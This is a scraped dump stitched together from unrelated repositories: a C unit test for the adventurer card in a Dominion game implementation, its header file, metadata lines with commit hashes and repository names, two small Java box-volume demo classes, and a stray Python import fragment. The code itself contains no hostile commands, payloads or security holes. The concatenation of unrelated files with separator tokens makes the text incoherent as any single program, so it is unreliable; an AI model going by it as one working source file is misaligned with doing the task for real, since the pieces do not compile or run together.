Testing Adventurer Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "dominion_helpers.h"
#include "interface.h"
#include "unit.h"
#include <time.h>
#include <math.h>
#define NUM_TESTS 20
int asserttrue(int statement);
int countDeckTreasure(struct gameState *state);
int main (int argc, char** argv) {
time_t t;
// Intializes random number generator
srand((unsigned) time(&t));
int execSuccess = 0;
int cardSuccess = 0;
printf("____________________________________________________\n");
printf("Testing adventurer card\n\n");
fflush(stdout);
int i;
for(i=0; i<NUM_TESTS; i++){
struct gameState state;
int players = 2;
int seed = rand();
int choice1 = 0; // not used for adventurer
int choice2 = 0; // not used for adventurer
int choice3 = 0; // not used for adventurer
int handPos = 0; // not used for adventurer
int bonus = 0; // not used for adventurer
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
// init game
initializeGame(players, k, seed, &state);
int handCountBefore = numHandCards(&state);
int deckTreasureBefore = countDeckTreasure(&state);
int played = (cardEffect(adventurer, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
execSuccess += asserttrue(played);
int handCountAfter = numHandCards(&state);
int cardsToDraw = (deckTreasureBefore > 2) ? 2: deckTreasureBefore;
cardSuccess += asserttrue((handCountAfter - handCountBefore) == cardsToDraw);
}
// tallied results
printf("\tplay adventurer successfully executed: %d of %d times.\n", execSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of cards in hand: %d of %d times.\n", cardSuccess, NUM_TESTS);
fflush(stdout);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
int asserttrue(int statement) {
if (statement) {
return TRUE;
} else {
return FALSE;
}
}
// counts the treasure that can be drawn
int countDeckTreasure(struct gameState *state) {
int count = 0;
int i;
for (i = 0; i < state->deckCount[state->whoseTurn]; i++) {
// test if treasure
switch(state->deck[state->whoseTurn][i]) {
case copper:
case silver:
case gold:
count++;
}
}
return count;
}<file_sep>#ifndef _UNIT_H
#define _UNIT_H
#include "dominion.h"
int whoseTurn(struct gameState *state);
int drawCard(int player, struct gameState* state);
int updateCoins(int player, struct gameState* state, int bonus);
int discardCard(int handPos, int currentPlayer, struct gameState* state,
int trashFlag);
int gainCard(int supplyPos, struct gameState* state, int toFlag, int player);
int getCost(int cardNumber);
int cardEffect(int card, int choice1, int choice2, int choice3,
struct gameState* state, int handPos, int* bonus);
int playSmithy(int currentPlayer, struct gameState* state, int handPos);
int playCutpurse(int currentPlayer, struct gameState* state, int handPos);
int playAdventurer(int currentPlayer, struct gameState* state);
int playEmbargo(int currentPlayer, struct gameState* state, int handPos, int choice1);
int playTribute(int currentPlayer, struct gameState* state);
#endif
<file_sep>Name: <NAME>, onid: guzmannj
|
a4970f41c69bd39472f40c0357a7ad08a3a873b7
|
[
"Markdown",
"C",
"Makefile"
] | 15 |
C
|
DeadCatLady/CS362-004-S2018
|
435c36ee40eec42ab2ddf15e0a0b063286fb82a1
|
c211f7e1e14ebde9a25be51776ecdefd2289a351
|
refs/heads/master
|
<repo_name>younus21/class<file_sep>/BoxDemo.java
package Cheaprer6;
public class BoxDemo {
public static void main(String[] args) {
// TODO Auto-generated method stub
Box1 mybox = new Box1();
double vol;
// assign values to mybox's instance variables
mybox.width = 10;
mybox.height = 20;
mybox.depth = 15;
// compute volume of box
vol = mybox.width * mybox.height * mybox.depth;
System.out.println("Volume is " + vol);
}
}
<file_sep>/BoxDemo2.java
package Cheaprer6;
public class BoxDemo2 {
public static void main(String[] args) {
// TODO Auto-generated method stub
BoxDemo3 mybox1 = new BoxDemo3();
BoxDemo3 mybox2 = new BoxDemo3();
mybox1.setdim(10,20,30);
mybox2.setdim(10,2,3);
double vol1,vol2;
vol1 = mybox1.younus();
System.out.println(vol1);
vol2 = mybox2.younus();
System.out.println(vol2);
}
}
|
5eede1c748e49d36d35963988907c39e561df8dc
|
[
"Java"
] | 2 |
Java
|
younus21/class
|
51bd3394a695eacaeecf9e48988cf9e611d0b9ca
|
422e39a0db8e1056e528d7990b3bfc21110dc880
|
refs/heads/master
|
<file_sep>const _ = require('underscore');
const checkTypes = require('check-types');
import { CanDeployOptions } from '../can-deploy';
import { MessageOptions } from '../message';
import { PublisherOptions } from '../publisher';
import { ServiceOptions } from '../service';
import { VerifierOptions } from '../verifier';
export type SpawnArguments =
| CanDeployOptions[]
| MessageOptions
| PublisherOptions
| ServiceOptions
| VerifierOptions
| {}; // Empty object is allowed to make tests less noisy. We should change this in the future
export const DEFAULT_ARG = 'DEFAULT';
export class Arguments {
public toArgumentsArray(
args: SpawnArguments,
mappings: { [id: string]: string },
): string[] {
return _.chain(args instanceof Array ? args : [args])
.map((x: SpawnArguments) => this.createArgumentsFromObject(x, mappings))
.flatten()
.value();
}
private createArgumentsFromObject(
args: SpawnArguments,
mappings: { [id: string]: string },
): string[] {
return _.chain(args)
.reduce((acc: any, value: any, key: any) => {
if (value && mappings[key]) {
let mapping = mappings[key];
let f = acc.push.bind(acc);
if (mapping === DEFAULT_ARG) {
mapping = '';
f = acc.unshift.bind(acc);
}
_.map(checkTypes.array(value) ? value : [value], (v: any) =>
f([mapping, `'${v}'`]),
);
}
return acc;
}, [])
.flatten()
.compact()
.value();
}
}
export default new Arguments();
<file_sep>// tslint:disable:no-string-literal
import cp = require('child_process');
import { ChildProcess, SpawnOptions } from 'child_process';
import * as path from 'path';
import logger from '../logger';
import pactEnvironment from '../pact-environment';
import argsHelper, { SpawnArguments } from './arguments';
const _ = require('underscore');
export class Spawn {
public get cwd(): string {
return path.resolve(__dirname, '..');
}
public spawnBinary(
command: string,
args: SpawnArguments = {},
argMapping: { [id: string]: string } = {},
): ChildProcess {
const envVars = JSON.parse(JSON.stringify(process.env)); // Create copy of environment variables
// Remove environment variable if there
// This is a hack to prevent some weird Traveling Ruby behaviour with Gems
// https://github.com/pact-foundation/pact-mock-service-npm/issues/16
delete envVars['RUBYGEMS_GEMDEPS'];
let file: string;
let opts: SpawnOptions = {
cwd: pactEnvironment.cwd,
detached: !pactEnvironment.isWindows(),
env: envVars,
};
let cmd: string = [command]
.concat(argsHelper.toArgumentsArray(args, argMapping))
.join(' ');
let spawnArgs: string[];
if (pactEnvironment.isWindows()) {
file = 'cmd.exe';
spawnArgs = ['/s', '/c', cmd];
(opts as any).windowsVerbatimArguments = true;
} else {
cmd = `./${cmd}`;
file = '/bin/sh';
spawnArgs = ['-c', cmd];
}
logger.debug(
`Starting pact binary with '${_.flatten([
file,
spawnArgs,
JSON.stringify(opts),
])}'`,
);
const instance = cp.spawn(file, spawnArgs, opts);
instance.stdout.setEncoding('utf8');
instance.stderr.setEncoding('utf8');
instance.stdout.on('data', logger.debug.bind(logger));
instance.stderr.on('data', logger.debug.bind(logger));
instance.on('error', logger.error.bind(logger));
instance.once('close', code => {
if (code !== 0) {
logger.warn(`Pact exited with code ${code}.`);
}
});
logger.info(`Created '${cmd}' process with PID: ${instance.pid}`);
return instance;
}
public killBinary(binary: ChildProcess): boolean {
if (binary) {
const pid = binary.pid;
logger.info(`Removing Pact with PID: ${pid}`);
binary.removeAllListeners();
// Killing instance, since windows can't send signals, must kill process forcefully
try {
pactEnvironment.isWindows()
? cp.execSync(`taskkill /f /t /pid ${pid}`)
: process.kill(-pid, 'SIGINT');
} catch (e) {
return false;
}
}
return true;
}
}
export default new Spawn();
<file_sep>import q = require('q');
import logger from './logger';
import spawn from './spawn';
import pactStandalone from './pact-standalone';
import * as _ from 'underscore';
const checkTypes = require('check-types');
export class CanDeploy {
public static convertForSpawnBinary(
options: CanDeployOptions,
): CanDeployOptions[] {
// This is the order that the arguments must be in, everything else is afterwards
const keys = ['participant', 'participantVersion', 'latest', 'to'];
// Create copy of options, while omitting the arguments specified above
const args: CanDeployOptions[] = [_.omit(options, keys)];
// Go backwards in the keys as we are going to unshift them into the array
keys.reverse().forEach(key => {
const val: any = options[key];
if (options[key] !== undefined) {
const obj: any = {};
obj[key] = val;
args.unshift(obj);
}
});
return args;
}
public readonly options: CanDeployOptions;
private readonly __argMapping = {
participant: '--pacticipant',
participantVersion: '--version',
latest: '--latest',
to: '--to',
pactBroker: '--broker-base-url',
pactBrokerToken: '--broker-token',
pactBrokerUsername: '--broker-username',
pactBrokerPassword: '--broker-password',
output: '--output',
verbose: '--verbose',
retryWhileUnknown: '--retry-while-unknown',
retryInterval: '--retry-interval',
};
constructor(options: CanDeployOptions) {
options = options || {};
// Setting defaults
options.timeout = options.timeout || 60000;
checkTypes.assert.nonEmptyString(
options.participant,
'Must provide the participant argument',
);
checkTypes.assert.nonEmptyString(
options.participantVersion,
'Must provide the participant version argument',
);
checkTypes.assert.nonEmptyString(
options.pactBroker,
'Must provide the pactBroker argument',
);
options.latest !== undefined &&
checkTypes.assert.nonEmptyString(options.latest.toString());
options.to !== undefined && checkTypes.assert.nonEmptyString(options.to);
options.pactBrokerToken !== undefined &&
checkTypes.assert.nonEmptyString(options.pactBrokerToken);
options.pactBrokerUsername !== undefined &&
checkTypes.assert.string(options.pactBrokerUsername);
options.pactBrokerPassword !== undefined &&
checkTypes.assert.string(options.pactBrokerPassword);
if (
(options.pactBrokerUsername && !options.pactBrokerPassword) ||
(options.pactBrokerPassword && !options.pactBrokerUsername)
) {
throw new Error(
'Must provide both Pact Broker username and password. None needed if authentication on Broker is disabled.',
);
}
this.options = options;
}
public canDeploy(): q.Promise<any> {
logger.info(
`Asking broker at ${this.options.pactBroker} if it is possible to deploy`,
);
const deferred = q.defer<string[]>();
const instance = spawn.spawnBinary(
`${pactStandalone.brokerPath} can-i-deploy`,
CanDeploy.convertForSpawnBinary(this.options),
this.__argMapping,
);
const output: any[] = [];
instance.stdout.on('data', l => output.push(l));
instance.stderr.on('data', l => output.push(l));
instance.once('close', code => {
const o = output.join('\n');
let success = false;
if (this.options.output === 'json') {
success = JSON.parse(o).summary.deployable;
} else {
success = /Computer says yes/gim.exec(o) !== null;
}
if (code === 0 || success) {
logger.info(o);
return deferred.resolve();
}
logger.error(`can-i-deploy did not return success message:\n${o}`);
return deferred.reject(new Error(o));
});
return deferred.promise.timeout(
this.options.timeout as number,
`Timeout waiting for verification process to complete (PID: ${instance.pid})`,
);
}
}
export default (options: CanDeployOptions) => new CanDeploy(options);
export interface CanDeployOptions {
participant?: string;
participantVersion?: string;
to?: string;
latest?: boolean | string;
pactBroker: string;
pactBrokerToken?: string;
pactBrokerUsername?: string;
pactBrokerPassword?: string;
output?: 'json' | 'table';
verbose?: boolean;
retryWhileUnknown?: number;
retryInterval?: number;
timeout?: number;
}
|
7d600117833480033efdaa25572e5f6f482ac3d9
|
[
"TypeScript"
] | 3 |
TypeScript
|
vgrigoruk/pact-node
|
bdb5baea57f278621cbccdb9bc48536525b7ab90
|
e87e295a301014f4a7e7b919bcb83ce72bc454c8
|
refs/heads/master
|
<repo_name>wangkunctc/Generate-Music-Bidirectional-RNN<file_sep>/README.md
# Generate-Music-Bidirectional-RNN
Generate music using a dynamic bidirectional recurrent neural network in TensorFlow

This RNN model generates 2 outputs, backward and forward. In this case both are quite similar, differing based on the initial temperature used for generation.
```text
batch: 1, loss: 1.03366, speed: 23.2230839729 s / epoch
batch: 2, loss: 1.01434, speed: 22.9636318684 s / epoch
batch: 3, loss: 0.995827, speed: 22.9477238655 s / epoch
batch: 4, loss: 0.977869, speed: 22.9385609627 s / epoch
batch: 5, loss: 0.960333, speed: 22.9393310547 s / epoch
batch: 6, loss: 0.943209, speed: 22.9278440475 s / epoch
batch: 7, loss: 0.926511, speed: 22.9437839985 s / epoch
batch: 8, loss: 0.910224, speed: 22.9244501591 s / epoch
batch: 9, loss: 0.894379, speed: 22.9693090916 s / epoch
batch: 10, loss: 0.879009, speed: 22.9410529137 s / epoch
batch: 11, loss: 0.864144, speed: 23.2230038643 s / epoch
batch: 12, loss: 0.849706, speed: 23.0044908524 s / epoch
batch: 13, loss: 0.835787, speed: 23.0095338821 s / epoch
batch: 14, loss: 0.822327, speed: 23.1483099461 s / epoch
batch: 15, loss: 0.809317, speed: 23.0863668919 s / epoch
batch: 16, loss: 0.796733, speed: 23.0318582058 s / epoch
batch: 17, loss: 0.784547, speed: 23.0388588905 s / epoch
batch: 18, loss: 0.772794, speed: 23.0113451481 s / epoch
batch: 19, loss: 0.761443, speed: 23.0499649048 s / epoch
batch: 20, loss: 0.750422, speed: 23.054156065 s / epoch
```
### Some output




The generated wave actually looks quite nice, but it does not correspond to real sound yet: it is essentially noise that tries to mimic the real song. I will try to improve this in the future.
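The sampling loop that produces these waves (see `graph.py`) works by predicting one chunk, averaging the backward and forward outputs, and feeding that mean back in as the next input. A minimal sketch of that loop, with a hypothetical `step_fn` standing in for the real `model.step`:

```python
def generate(step_fn, seed, n_chunks):
    # step_fn(chunk) returns (backward_prediction, forward_prediction),
    # mirroring the 2-row probs array returned by model.step
    backward, forward = step_fn(seed)
    back_out, fwd_out = list(backward), list(forward)
    for _ in range(n_chunks):
        # feed the element-wise mean of both directions back in,
        # as graph.py does with np.mean(probs, axis=0)
        nxt = [(b + f) / 2.0 for b, f in zip(backward, forward)]
        backward, forward = step_fn(nxt)
        back_out += list(backward)
        fwd_out += list(forward)
    return back_out, fwd_out
```

Both output streams grow by one chunk per iteration; with the real model, the "left" and "right" waves in the plots above correspond to `back_out` and `fwd_out`.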
<file_sep>/graph.py
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="whitegrid", palette="muted")
import numpy as np
def generategraph(real_data, model, sess, samplerate, boundary, checkpoint = False):
initial = np.random.randint(0, real_data.shape[0] / 2)
fig = plt.figure(figsize = (10,15))
if checkpoint:
length = 10
else:
while True:
length = raw_input("insert length of sound(sec): ")
try:
length = int(length)
break
except:
print "enter INTEGER only"
plt.subplot(3, 1, 1)
plt.plot(real_data[initial : initial + (length * samplerate)])
plt.title("real music")
probs = model.step(sess, np.array([real_data[initial : initial + boundary]]), True)
backward_generated = probs[0, :].tolist()
forward_generated = probs[1, :].tolist()
for x in xrange(0, length * (samplerate / boundary)):
probs = model.step(sess, np.array([np.mean(probs, axis = 0)]), False)
backward_generated += probs[0, :].tolist()
forward_generated += probs[1, :].tolist()
plt.subplot(3, 1, 2)
plt.plot(backward_generated)
plt.title("left generated")
plt.subplot(3, 1, 3)
plt.plot(forward_generated)
plt.title("right generated")
fig.tight_layout()
plt.savefig('graph.png')
plt.savefig('graph.pdf')
<file_sep>/settings.py
import tensorflow as tf
tf.app.flags.DEFINE_integer("amplitude", 40, "increase the wave by this factor")
tf.app.flags.DEFINE_float("learning_rate", 0.00001, "Learning rate.")
tf.app.flags.DEFINE_integer("sound_batch_size", 1000, "Sound batch size to use during training.")
tf.app.flags.DEFINE_integer("checkpoint_epoch", 10, "Checkpoint to save and testing")
tf.app.flags.DEFINE_integer("max_epoch", 1000, "Limit on the size of training data (0: no limit).")
tf.app.flags.DEFINE_integer("size", 256, "Size of each model layer.")
tf.app.flags.DEFINE_integer("num_layers", 2, "Number of layers in the model.")
tf.app.flags.DEFINE_string("train_dir", "/home/husein/Generate-Music-Bidirectional-RNN/", "Training directory.")
tf.app.flags.DEFINE_string("data_dir", "/home/husein/Generate-Music-Recurrent-Neural-Network/data/", "data location.")
tf.app.flags.DEFINE_boolean("decode", False, "Set to True for interactive decoding.")
memory_duringtraining = 0.8
memory_duringtesting = 0.1
FLAGS = tf.app.flags.FLAGS
def get_data_type():
return tf.float64 if FLAGS.use_fp64 else tf.float32
config = tf.ConfigProto()
config.gpu_options.allocator_type = 'BFC'
if FLAGS.decode:
config.gpu_options.per_process_gpu_memory_fraction = memory_duringtesting
else:
config.gpu_options.per_process_gpu_memory_fraction = memory_duringtraining<file_sep>/utils.py
import numpy as np
import soundfile as sf
import os
def get_data_from_location(location, amplitude):
list_data = os.listdir(location)
if len(list_data) == 0:
print "not found any data, exiting.."
exit(0)
for i in list_data:
if i.find('.wav') < 0 and i.find('.flac') < 0:
print "Only support .WAV or .FLAC, exiting.."
exit(0)
samplerate = []
for i in list_data:
_, sample = sf.read(location + i)
samplerate.append(sample)
if len(set(samplerate)) > 1:
print "make sure all sample rate are same, exiting.."
exit(0)
data, samplerate = sf.read(location + list_data[0])
if len(data.shape) > 1:
data = data[:, 0]
for i in xrange(1, len(list_data), 1):
sample_data, _ = sf.read(location + list_data[i])
if len(sample_data.shape) > 1:
sample_data = sample_data[:, 0]
data = np.append(data, sample_data, axis = 0)
return data * amplitude, samplerate<file_sep>/main.py
from utils import get_data_from_location
from graph import generategraph
from model import Model
from settings import *
import tensorflow as tf
import numpy as np
import time
dataset, samplerate = get_data_from_location(FLAGS.data_dir, FLAGS.amplitude)
# this is for neural network
model = Model(FLAGS.learning_rate, FLAGS.num_layers, FLAGS.sound_batch_size, FLAGS.size)
# start the session graph
sess = tf.InteractiveSession()
# initialize global variables
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(tf.global_variables())
def train():
print "Train for " + str(FLAGS.max_epoch) + " iteration"
for i in xrange(FLAGS.max_epoch):
last_time = time.time()
init_value = np.zeros((1, FLAGS.num_layers * 2 * FLAGS.size))
for x in xrange(0, dataset.shape[0] - (2 * FLAGS.sound_batch_size), FLAGS.sound_batch_size):
batch = np.zeros((1, 1, FLAGS.sound_batch_size))
batch_y = np.zeros((1, 1, FLAGS.sound_batch_size))
batch[0, 0, :] = dataset[x: x + FLAGS.sound_batch_size]
batch_y[0, 0, :] = dataset[x + FLAGS.sound_batch_size: x + (2 * FLAGS.sound_batch_size)]
_, loss = sess.run([model.optimizer, model.cost], feed_dict={model.X: batch, model.Y: batch_y,
model.back_hidden_layer: init_value, model.forward_hidden_layer: init_value})
print "batch: " + str(i + 1) + ", loss: " + str(np.mean(loss)) + ", speed: " + str(time.time() - last_time) + " s / epoch"
if (i + 1) % FLAGS.checkpoint_epoch == 0:
saver.save(sess, FLAGS.train_dir + "model.ckpt")
generategraph(dataset, model, sess, samplerate, FLAGS.sound_batch_size, checkpoint = True)
def test():
    # restore the last saved checkpoint and generate a sample graph
    saver.restore(sess, FLAGS.train_dir + "model.ckpt")
    generategraph(dataset, model, sess, samplerate, FLAGS.sound_batch_size)
def main():
    if FLAGS.decode:
        test()
    else:
        train()
main()
import tensorflow as tf
import numpy as np
class Model:
def __init__(self, learning_rate, num_layers, shape_3d, size_layer):
self.num_layers = num_layers
self.size_layer = size_layer
rnn_cells = tf.nn.rnn_cell.LSTMCell(size_layer, state_is_tuple = False)
self.back_rnn_cells = tf.nn.rnn_cell.MultiRNNCell([rnn_cells] * num_layers, state_is_tuple = False)
self.forward_rnn_cells = tf.nn.rnn_cell.MultiRNNCell([rnn_cells] * num_layers, state_is_tuple = False)
self.X = tf.placeholder(tf.float32, (None, None, shape_3d))
self.Y = tf.placeholder(tf.float32, (None, None, shape_3d))
self.net_last_state = np.zeros((num_layers * 2 * size_layer))
self.back_hidden_layer = tf.placeholder(tf.float32, shape=(None, num_layers * 2 * size_layer))
self.forward_hidden_layer = tf.placeholder(tf.float32, shape=(None, num_layers * 2 * size_layer))
self.outputs, self.last_state = tf.nn.bidirectional_dynamic_rnn(self.forward_rnn_cells, self.back_rnn_cells,
self.X, sequence_length = [1],
initial_state_fw = self.forward_hidden_layer, initial_state_bw = self.back_hidden_layer,
dtype = tf.float32)
self.rnn_W = tf.Variable(tf.random_normal((size_layer, shape_3d)))
self.rnn_B = tf.Variable(tf.random_normal((shape_3d,)))
# linear dimension for x in (Wx + B)
outputs_reshaped = tf.reshape(self.outputs, [-1, size_layer])
y_batch_long = tf.reshape(self.Y, [-1, shape_3d])
# y = Wx + B
self.logits = (tf.matmul(outputs_reshaped, self.rnn_W) + self.rnn_B)
self.cost = tf.square(y_batch_long - self.logits)
self.optimizer = tf.train.AdamOptimizer(learning_rate).minimize(self.cost)
def step(self, sess, x, init_zero_state = True):
# Reset the initial state of the network.
if init_zero_state:
init_value = np.zeros((self.num_layers * 2 * self.size_layer,))
else:
init_value = self.net_last_state
# we want to get the constant in our output layer, same size as dimension input
probs, next_lstm_state = sess.run([self.logits, self.last_state], feed_dict={self.X:[x], self.back_hidden_layer:[init_value], self.forward_hidden_layer:[init_value]})
self.net_last_state = next_lstm_state[0][0]
return probs
|
e75c83970e1a686708636f4823c0a250457a3d56
|
[
"Markdown",
"Python"
] | 6 |
Markdown
|
wangkunctc/Generate-Music-Bidirectional-RNN
|
cd5006b53a473e2099cb74c4cbbd48096d49fa25
|
a99fdc85ff8192254fbccde54cdb7019e9120d74
|
refs/heads/master
|
<repo_name>craigplusplus/jquery-dynalist<file_sep>/README.md
Dynalist jQuery Plugin -- OBSOLETE
======================
This is a script that handles a list with nested collapsing sections in a style-agnostic way. It is not assumed that the list is formatted as tabbed data, or an accordion list, or any other format. These presentational concerns are restricted to the accompanying stylesheets.
The impetus of this was the need to apply responsive web design to information-dense websites. In mobile views, accordion lists are the go-to solution for particularly heavy pages, while desktop users might prefer tabs of one kind or another. Since most scripts out there are designed for one format or the other, there was a need for a flexible script such as this.
Included Stylesheets
--------------------
Naturally, a script such as this is useless without separate stylesheets defining the format. Included are two: v_tabs and h_tabs. v_tabs.css defines rules for a list which is formatted as vertical tabs in a desktop environment, and an accordion list on mobile. h_tabs likewise formats as an accordion on mobile, but provides horizontal tabs on desktop.
Usage Example
-------------
See the included test.html file for live examples.
<!-- Include the stylesheet for horizontal tabs -->
<link rel="stylesheet" type='text/css' href='h_tabs.css' />
<script src='jquery.dynalist.js'></script>
<script>
$(document).ready(function(){
$('#horizontal_tabs_eg').dynalist( {
desktop: {
// The open list item is pre-chosen by assigning this class to it
visibleSelector: '.open',
// No animation
hideSpeed: 0,
// One tab is always open
fullyCollapsable: false },
mobile: {
// Conversely, on mobile, no list item is visible by default.
visibleSelector: null
}
} );
});
</script>
<!-- ... -->
<ul id='horizontal_tabs_eg' class='horizontal_tabs'>
<li>First Tab
<ul>
<li>Link 1.1</li>
<li>Link 1.2</li>
<li>Link 1.3</li>
</ul>
</li>
<li class='open'>Second Tab
<ul>
<li>This is the content</li>
<li>In this case, I'm imagining a list of links</li>
<li>Could be anything, though.</li>
</ul>
</li>
<li>Third Tab
<ul>
<li>Link 3.1</li>
<li>Link 3.2</li>
<li>Link 3.3</li>
</ul>
</li>
</ul>
Options
-------
Note that it is possible to define different behaviour for desktops than for mobile devices. The 'options' object holds two sub-objects, 'desktop' and 'mobile'. A variable defined in either of these will override the behaviour defined in the root 'options' object. Only two variables, 'selectedClass' and 'switchWidth', may not be overridden.
* selectedClass (string): A classname to apply to the selected list item. Default: 'open'.
Note: This cannot be overridden by the Desktop or Mobile sub-objects.
* switchWidth (int): The threshold width above which a desktop platform is assumed. Default: 480.
* visibleSelector (string): Elements matching this selector will be marked as visible when the script is initialized. Default: ':first'.
* fullyCollapsable (boolean): Defines the behaviour to occur when an already visible element is clicked. If true, the element will be hidden, and the list will be fully collapsed. If false, no action will be taken. Default: true.
* hideSpeed (int): The duration of any conceal animation, in milliseconds. Default: 500.
* showSpeed (int): The duration of any reveal animation, in milliseconds. Default: 500.
* hideAction (callback function): A function to handle the conceal animation for list content. Accepts two parameters: the jQuery collection to apply the animation to, and the speed at which the animation should proceed. Note that two functions are provided as members of the dynalist object for use here; dynalist.slideUp and dynalist.fadeOut. These functions are merely wrappers around the native jQuery effects. Default: $.fn.dynalist.slideUp.
* showAction (callback function): A function to handle the reveal animation for list content. Accepts two parameters: the jQuery collection to apply the animation to, and the speed at which the animation should proceed. Note that two functions are provided as members of the dynalist object for use here; dynalist.slideDown and dynalist.fadeIn. These functions are merely wrappers around the native jQuery effects. Default: $.fn.dynalist.slideDown.
* desktop (object): A sub-object in which any of the above options (except those noted) may be overridden for use in a desktop environment.
* mobile (object): A sub-object in which any of the above options (except those noted) may be overridden for use in a mobile environment.
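The precedence rules above (user options override plugin defaults, the `desktop`/`mobile` sub-objects override both, and `selectedClass`/`switchWidth` stay universal) can be sketched as follows. Python is used here as neutral pseudocode for the `$.extend` merges; `resolve_options` is illustrative and not part of the plugin:

```python
def resolve_options(defaults, user, platform):
    # user options override the plugin defaults, like $.extend(defaults, o)
    merged = dict(defaults)
    merged.update(user)
    # the per-platform sub-object ('desktop' or 'mobile') overrides the rest
    effective = dict(merged)
    effective.update(merged.get(platform, {}))
    # universal keys are always read from the root options, never the sub-object
    for key in ('selectedClass', 'switchWidth'):
        effective[key] = merged.get(key, defaults.get(key))
    return effective
```

For example, with `user = {'hideSpeed': 0, 'mobile': {'hideSpeed': 250}}`, the effective `hideSpeed` is 250 on mobile but 0 on desktop.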
Customization
-------------
Note that some member functions of the dynalist object are publicly defined and accessible. This means that they can be redefined before use to modify certain behaviour. This is particularly useful in the case of dynalist.isMobile(), the member function used to decide whether an environment is considered to be desktop or mobile.
By design, this function works rather naively, simply comparing the browser width to the switchWidth option. Depending on your usage, you may well want more complex decision making here. Below is an example of overriding this function with one that makes its determination based on an element that is hidden by CSS media queries for mobile devices. Such a method has the advantage of keeping the determination of environment type completely restricted to the stylesheet files.
<style type='text/css' media="screen and (min-device-width: 480px)">
.not_mobile { display: none; }
</style>
<script src='jquery.dynalist.js'></script>
<script>
// Create custom behaviour
$.fn.dynalist.isMobile = function( switchWidth ) {
return $('.not_mobile:visible').length > 0;
}
// Then init
$(document).ready(function(){
$('#your_list').dynalist();
});
</script>
Author
------
<NAME>
<EMAIL>.info
Licence
-------
!["Creative Commons License"] (http://i.creativecommons.org/l/by/3.0/88x31.png)
This work is licensed under a [Creative Commons Attribution 3.0 Unported License](http://creativecommons.org/licenses/by/3.0/).
<file_sep>/jquery.dynalist.js
/**
* dynalist
* Author <NAME> 2012
*/
/**
* jQuery plug-in to compress and expand lists with nested elements.
* Intended to be used with CSS to provide a tabbed view on desktop
* and accordion view on mobile devices, according to responsive design principles.
*
* See defaults object below for full list of configuration options.
*
* @author <NAME>
*/
(function($) {
$.fn.dynalist = function( o ) {
// Usual defaults override, plus population of mobile / desktop sub-objects with defaults
var vars = $.extend( {}, $.fn.dynalist.defaults, o );
vars.desktop = $.extend( {}, vars, vars.desktop );
vars.mobile = $.extend( {}, vars, vars.mobile );
var dynalist = $.fn.dynalist;
// Wrap any text nodes, in case the triggering phrase has not been wrapped
this.children().contents().filter(function() {
return this.nodeType == 3 && $.trim(this.textContent) != '';
}).wrap('<span></span>');
// Hide everything to begin with
this.children().children(':not(:first-child)').hide();
// Show elements matching visibleSelector, if this is called for
var visibleSelector = dynalist.isMobile( vars.switchWidth )
? vars.mobile.visibleSelector
: vars.desktop.visibleSelector;
if( visibleSelector ) {
this.children( visibleSelector ).addClass( vars.selectedClass ).children(':not(:first-child)').show();
}
// Apply onClick behaviour
this.children().children(':first-child').click(function(evt){
var parent = $( this ).parent();
var fullyCollapsable = dynalist.isMobile( vars.switchWidth )
? vars.mobile.fullyCollapsable
: vars.desktop.fullyCollapsable;
evt.preventDefault();
conceal( parent.siblings() );
if( !parent.hasClass( vars.selectedClass ) ) {
reveal( parent );
} else if( fullyCollapsable ) {
conceal( parent );
}
});
// Member functions follow //
function reveal( el ) {
if( dynalist.isMobile( vars.switchWidth ) )
vars.mobile.showAction( el.children(':not(:first-child)'), getShowSpeed() );
else
vars.desktop.showAction( el.children(':not(:first-child)'), getShowSpeed() );
el.addClass( vars.selectedClass );
}
function conceal( el ) {
if( dynalist.isMobile( vars.switchWidth ) )
vars.mobile.hideAction( el.children(':not(:first-child)'), getHideSpeed() );
else
vars.desktop.hideAction( el.children(':not(:first-child)'), getHideSpeed() );
el.removeClass( vars.selectedClass );
}
function getHideSpeed() {
return dynalist.isMobile( vars.switchWidth ) ? vars.mobile.hideSpeed : vars.desktop.hideSpeed;
}
function getShowSpeed() {
return dynalist.isMobile( vars.switchWidth ) ? vars.mobile.showSpeed : vars.desktop.showSpeed;
}
return this;
};
/* Member function to determine whether we are in a mobile or desktop state.
* @param Int switchWidth From dynalist.defaults, this contains the browser width
* considered to be the threshold between mobile and desktop views.
*/
$.fn.dynalist.isMobile = function( switchWidth ) {
return $(window).width() < switchWidth;
}
/* Default animation functions, for use as callbacks for hideAction and showAction options. */
$.fn.dynalist.fadeOut = function( coll, speed ) { coll.fadeOut( speed ); };
$.fn.dynalist.fadeIn = function( coll, speed ) { coll.fadeIn( speed ); };
$.fn.dynalist.slideUp = function( coll, speed ) { coll.slideUp( speed ); };
$.fn.dynalist.slideDown = function( coll, speed ) { coll.slideDown( speed ); };
$.fn.dynalist.defaults = {
// NOTE: The following two variables are universal;
// they cannot be overridden by the desktop or mobile sub-objects.
selectedClass: 'open', // Classname to apply to selected list item
switchWidth: 480, // Pixel width to switch animations at
// All following variables may be overridden by desktop or mobile sub-objects.
visibleSelector: ':first', // Elements matching this selector will be visible on load.
fullyCollapsable: true, // If true, clicking on an open tab will close it.
hideSpeed: 500, // Duration of animation in milliseconds
showSpeed: 500, // Duration of animation in milliseconds
// Follows are the callback functions to apply a show or hide animation.
// All functions accept two parameters:
// the jQuery collection of tabs to show or hide, and the speed in milliseconds to do it at.
hideAction: $.fn.dynalist.slideUp,
showAction: $.fn.dynalist.slideDown,
// Follows are setting overrides to apply only in desktop mode or mobile mode.
// See above for variables which cannot be overridden.
desktop: {
desktop: null, // Just to keep things tidy upon extend call
mobile: null // Just to keep things tidy upon extend call
},
mobile: {
desktop: null, // Just to keep things tidy upon extend call
mobile: null // Just to keep things tidy upon extend call
}
};
})(jQuery);
|
6be8e1e5ca32dcebadbabe2eaef03b65151a7de5
|
[
"Markdown",
"JavaScript"
] | 2 |
Markdown
|
craigplusplus/jquery-dynalist
|
8d4480bb193e33b21ce610fc6c055adcf24293c8
|
482bc00fbd8c3df3d480ea2d329f4b4849bdf57b
|
refs/heads/master
|
<file_sep># Concurrent RPC invocation
import json
from multiprocessing.pool import ThreadPool
